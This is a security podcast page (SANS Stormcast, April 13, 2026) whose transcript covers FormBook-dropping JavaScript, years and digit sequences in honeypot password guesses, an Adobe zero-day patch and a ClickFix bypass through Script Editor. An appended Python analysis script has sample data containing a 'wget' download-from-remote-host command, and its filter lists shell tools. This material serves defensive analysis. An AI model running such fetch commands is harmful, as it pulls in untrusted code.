SANS Stormcast Monday, April 13th, 2026: Obfuscated JavaScript; Numbers in Passwords; Adobe Patches 0-Day; ClickFix Fix Bypass

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9888.mp3

My Next Class

Click here to learn more about classes Johannes is teaching for SANS.
Network Monitoring and Threat Detection In-Depth | Amsterdam | Apr 20th - Apr 25th 2026
Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 11th - May 16th 2026
Network Monitoring and Threat Detection In-Depth | Online | Arabian Standard Time | Jun 20th - Jun 25th 2026
Network Monitoring and Threat Detection In-Depth | Riyadh | Jun 20th - Jun 25th 2026
Application Security: Securing Web Apps, APIs, and Microservices | Washington | Jul 13th - Jul 18th 2026
Application Security: Securing Web Apps, APIs, and Microservices | Online | British Summer Time | Jul 27th - Aug 1st 2026
Application Security: Securing Web Apps, APIs, and Microservices | Las Vegas | Sep 21st - Sep 26th 2026

Podcast Transcript

Hello and welcome to the Monday, April 13, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recorded today from Stockheim, Germany. And this episode is brought to you by the SANS.edu graduate certificate program in penetration testing and ethical hacking. Got two diaries today to talk about.

The first one is by Xavier. Xavier did run into an interesting piece of JavaScript that ultimately dropped FormBook, but had some interesting obfuscation quirks. First of all, it did contain 11 megabytes of JavaScript that was really just not used. That JavaScript was ASMDB, which is a database of assembly commands, kind of with documentation essentially about these assembly commands, sort of as a JavaScript file. So it's going to be meaningless, nothing malicious whatsoever. But then there is a little bit of less obfuscated JavaScript that will then just download three PNG files. Turns out these PNG files are not images in a classical sense, but AES-encrypted PowerShell scripts that will then download FormBook. So that's the attack chain here in short. If you want to look at more details, how to deobfuscate these scripts, well then check out Xavier's great diary.

And Jesse did a very nice and detailed analysis of the use of numbers in passwords being attempted against our honeypots. Now, the hypothesis behind this was something along the lines of users often selecting to add years, like 2026, to their password, so maybe attackers are attempting the same thing. And that's definitely true. So the most common digits are 0, 1, 2, 3, in part because, well, 2, 0, as in 20, is currently used in years. Also, of course, the letter 2 then in 25 and 26. He did also do a little heat map as to how this changed over time. And yes, 2025 was the most common four-digit combination found last year. It's still very common this year, but we are still at the beginning of 2026. And of course, attackers don't always update their tools very quickly, and that's probably to account for this delay, kind of, in them actually picking up on the password 2026. And of course, users also typically don't change all their passwords at the beginning of the year, but throughout the year they update the passwords from 2025 to 2026. Other common passwords are, of course, things like 1, 2, 3, 4, 5, and number sequences like this are commonly found that are not related to years. And there were a couple, sort of, I would call them kind of false positives. What often happens is that attackers in careless scripts are submitting part of their script to the username or password field. And then if you have, for example, a command line like ping -c with a number, like an example that Jesse found, 10,000, well, that's then going to be picked up as a number in a password in this case. So, yep, don't use your year or any sort of straight number sequences like 1, 2, 3, 4, 5 in your passwords. That's certainly something that attackers are looking for.

Well, atypically for Adobe, Adobe did release an emergency update for Adobe Acrobat Reader. This vulnerability, as became known late last week, is already actively being exploited. It's a remote code execution vulnerability, so definitely something that you must address quickly. The vulnerability has so far only been used to target specific organizations, so it hasn't been widely exploited. But as always, once a patch is released, that, of course, starts the race between patching and the largest possible exploitation effect. So definitely get started on patching. Adobe is also expected to release updates on Tuesday with the usual Patch Tuesday updates, but they decided that it's worth the effort here to actually release a special update a couple of days earlier and on a weekend.

And with the last major macOS update, Apple released an interesting fix for ClickFix. And what it really involved is monitoring what a user may copy-paste into Terminal. Well, according to Jamf, attackers have reacted and now came up with another sort of copy-paste trick in order to bypass this particular countermeasure. Instead of copy-pasting into Terminal, they're now copy-pasting into Script Editor. And apparently this is not detected by the current ClickFix protection that was built into the latest macOS. So it comes back down to user education on this one, and maybe some additional detections and monitoring on the endpoints themselves in order to detect any odd commands from being executed. But this one is actually even a little bit easier, as Apple makes available the AppleScript URL scheme. So any URL starting with applescript:// will actually automatically open Script Editor, and then the rest of the URL will be posted or copied into Script Editor. So it's actually even a little bit easier to convince a user to fall for this than it is with the classic ClickFix. And there was also a minor update for macOS this week, or end of this week, or this weekend. This particular update, 26.4.1, does not contain any additional security fixes.

Well, that's it for today. Thanks for listening. Thanks for liking. Thanks for subscribing. And talk to you again tomorrow. Bye.
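
The digit analysis Jesse describes, as an added example that is not from the diary or the podcast: a small Python script that takes honeypot password guesses, tallies digit frequency, four-digit combinations, year-like values per month (the heat-map view), and consecutive sequences like 12345, and skips entries that look like mis-submitted bot shell commands (the ping -c 10000 false positive). The sample attempts, the date format, and the shell-command heuristic are constructed for illustration and are not ISC data.

```python
import re
from collections import Counter, defaultdict

# Constructed sample of (date, password) pairs as a honeypot might log them.
# These are invented test values, not real ISC honeypot data.
SAMPLE_ATTEMPTS = [
    ("2025-11-03", "Welcome2025"),
    ("2025-11-03", "admin2025!"),
    ("2026-01-07", "Summer2026"),
    ("2026-01-07", "P@ssw0rd2026"),
    ("2026-01-08", "123456"),
    ("2026-01-08", "12345"),
    ("2026-02-14", "qwerty123"),
    ("2026-02-14", "admin"),
    ("2026-02-15", "root2024"),
    ("2026-03-01", "Password1"),
    ("2026-03-01", "ping -c 10000 203.0.113.5"),          # bot script leaked into the field
    ("2026-03-02", "cd /tmp; wget http://203.0.113.9/x.sh"),  # same: not a credential guess
    ("2026-03-02", "1q2w3e4r"),
    ("2026-03-03", "abc12345"),
]

DIGIT_RUN = re.compile(r"\d+")

# Heuristic (assumption, tune to your data): a leading shell command word followed
# somewhere by a flag, a path, a ';' or a pipe marks a mis-submitted script.
SHELL_LIKE = re.compile(
    r"^\s*(?:ping|cd|wget|curl|sh|bash|echo|chmod|uname|busybox|rm)\b"
    r".*(?:\s-[A-Za-z]|/|;|\|)"
)


def is_shell_command(pw: str) -> bool:
    return bool(SHELL_LIKE.search(pw))


def is_year(run: str, lo: int = 1950, hi: int = 2030) -> bool:
    """Four digits inside a plausible year range."""
    return len(run) == 4 and lo <= int(run) <= hi


def is_sequence(run: str, min_len: int = 3) -> bool:
    """True for strictly consecutive ascending or descending digits (123, 4321)."""
    if len(run) < min_len:
        return False
    deltas = {int(b) - int(a) for a, b in zip(run, run[1:])}
    return deltas == {1} or deltas == {-1}


def analyze(attempts):
    """Tally digit usage across password guesses, dropping shell-like false positives."""
    stats = {
        "guesses": 0, "skipped_shell": 0,
        "digit_freq": Counter(), "four_digit": Counter(),
        "years": Counter(), "sequences": Counter(),
        "years_by_month": defaultdict(Counter),  # heat-map input: month -> year -> count
    }
    for when, pw in attempts:
        if is_shell_command(pw):
            stats["skipped_shell"] += 1
            continue
        stats["guesses"] += 1
        for run in DIGIT_RUN.findall(pw):
            stats["digit_freq"].update(run)      # one count per digit character
            if len(run) == 4:
                stats["four_digit"][run] += 1
            if is_year(run):
                stats["years"][run] += 1
                stats["years_by_month"][when[:7]][run] += 1
            if is_sequence(run):
                stats["sequences"][run] += 1
    return stats


def weak_reasons(pw: str):
    """Policy check mirroring the diary's advice: flag years and digit sequences."""
    reasons = []
    for run in DIGIT_RUN.findall(pw):
        if is_year(run):
            reasons.append(f"contains year {run}")
        if is_sequence(run):
            reasons.append(f"contains digit sequence {run}")
    return reasons


if __name__ == "__main__":
    s = analyze(SAMPLE_ATTEMPTS)
    print("credential guesses:", s["guesses"], "| shell-like entries skipped:", s["skipped_shell"])
    print("most common digits:", s["digit_freq"].most_common(4))
    print("years:", s["years"].most_common())
    print("sequences:", s["sequences"].most_common())
    for month in sorted(s["years_by_month"]):
        print(month, dict(s["years_by_month"][month]))
    print("Welcome2026 ->", weak_reasons("Welcome2026"))
```

Run it as-is to see the tallies on the constructed sample; point `analyze` at your own (date, password) pairs from honeypot logs to reproduce the per-month year breakdown, and extend the `SHELL_LIKE` word list with whatever command prefixes your bots leak into the password field.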